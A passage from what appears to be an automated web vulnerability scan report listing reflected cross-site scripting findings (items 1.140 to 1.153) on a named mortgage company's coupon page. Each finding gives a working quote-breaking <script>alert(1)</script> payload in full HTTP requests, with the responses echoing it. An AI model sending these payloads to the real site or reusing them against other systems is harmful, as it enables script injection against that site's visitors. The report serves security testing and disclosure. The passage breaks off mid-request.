Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:29 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&scid=1794971&cid=696829cfc43'><script>alert(1)</script>24de61d88b7&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1' />
...[SNIP]...

1.140. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [dynamic_proxy parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c2239'><script>alert(1)</script>f71a112c65e was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1c2239'><script>alert(1)</script>f71a112c65e&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:56 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:47 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1c2239'><script>alert(1)</script>f71a112c65e&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1' />
...[SNIP]...

1.141. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [dynamic_proxy parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367c8"><script>alert(1)</script>5ab130b97d9 was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1367c8"><script>alert(1)</script>5ab130b97d9&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:55 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7a45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:47 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1367c8"><script>alert(1)</script>5ab130b97d9&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn">
...[SNIP]...

1.142. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d8aff'><script>alert(1)</script>47f8bcfe9d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?d8aff'><script>alert(1)</script>47f8bcfe9d3=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:36 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:28 GMT;path=/;httponly
Content-Length: 6199


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&d8aff'><script>alert(1)</script>47f8bcfe9d3=1&rl_track_landing_pages=1' />
...[SNIP]...

1.143. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96167"><script>alert(1)</script>32c7c592d7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?96167"><script>alert(1)</script>32c7c592d7e=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:35 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:27 GMT;path=/;httponly
Content-Length: 6199


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?96167"><script>alert(1)</script>32c7c592d7e=1&rl_track_landing_pages=1');" id="send_btn">
...[SNIP]...

1.144. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [primary_serv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76da2"><script>alert(1)</script>5dae8506858 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com76da2"><script>alert(1)</script>5dae8506858&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:02 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:53 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com76da2"><script>alert(1)</script>5dae8506858&rl_track_landing_pages=1');" id="send_btn">
...[SNIP]...

1.145. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [primary_serv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6389e'><script>alert(1)</script>e62412c1fab was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com6389e'><script>alert(1)</script>e62412c1fab&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:03 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:54 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com6389e'><script>alert(1)</script>e62412c1fab&rl_track_landing_pages=1' />
...[SNIP]...

1.146. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [rl_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 14188'><script>alert(1)</script>e40d41c94b6 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb014188'><script>alert(1)</script>e40d41c94b6&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:50 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:42 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb014188'><script>alert(1)</script>e40d41c94b6&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1' />
...[SNIP]...

1.147. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [rl_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a30c4"><script>alert(1)</script>c7a08c9e329 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0a30c4"><script>alert(1)</script>c7a08c9e329&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:49 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:41 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0a30c4"><script>alert(1)</script>c7a08c9e329&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn">
...[SNIP]...

1.148. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [rl_track_landing_pages parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 365b2"><script>alert(1)</script>3bd7c0702c5 was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1365b2"><script>alert(1)</script>3bd7c0702c5 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:07 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:59 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
ntactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1365b2"><script>alert(1)</script>3bd7c0702c5');" id="send_btn">
...[SNIP]...

1.149. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [rl_track_landing_pages parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 31691'><script>alert(1)</script>19c3a704535 was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=131691'><script>alert(1)</script>19c3a704535 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:08 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7a45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:45:00 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=131691'><script>alert(1)</script>19c3a704535' />
...[SNIP]...

1.150. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [scid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d36d"><script>alert(1)</script>507bab1fa3b was submitted in the scid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=17949714d36d"><script>alert(1)</script>507bab1fa3b&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:24 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:16 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=17949714d36d"><script>alert(1)</script>507bab1fa3b&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn">
...[SNIP]...

1.151. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [scid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64696'><script>alert(1)</script>dca245ab55 was submitted in the scid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=179497164696'><script>alert(1)</script>dca245ab55&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:25 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:16 GMT;path=/;httponly
Content-Length: 6459


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&scid=179497164696'><script>alert(1)</script>dca245ab55&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1' />
...[SNIP]...

1.152. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [tc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3a414'><script>alert(1)</script>e5878460b3e was submitted in the tc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=110203080025953193a414'><script>alert(1)</script>e5878460b3e&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:44 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7c45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:36 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&scid=1794971&cid=696829&tc=110203080025953193a414'><script>alert(1)</script>e5878460b3e&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1' />
...[SNIP]...

1.153. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [tc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba9e7"><script>alert(1)</script>71945edcd2 was submitted in the tc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319ba9e7"><script>alert(1)</script>71945edcd2&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
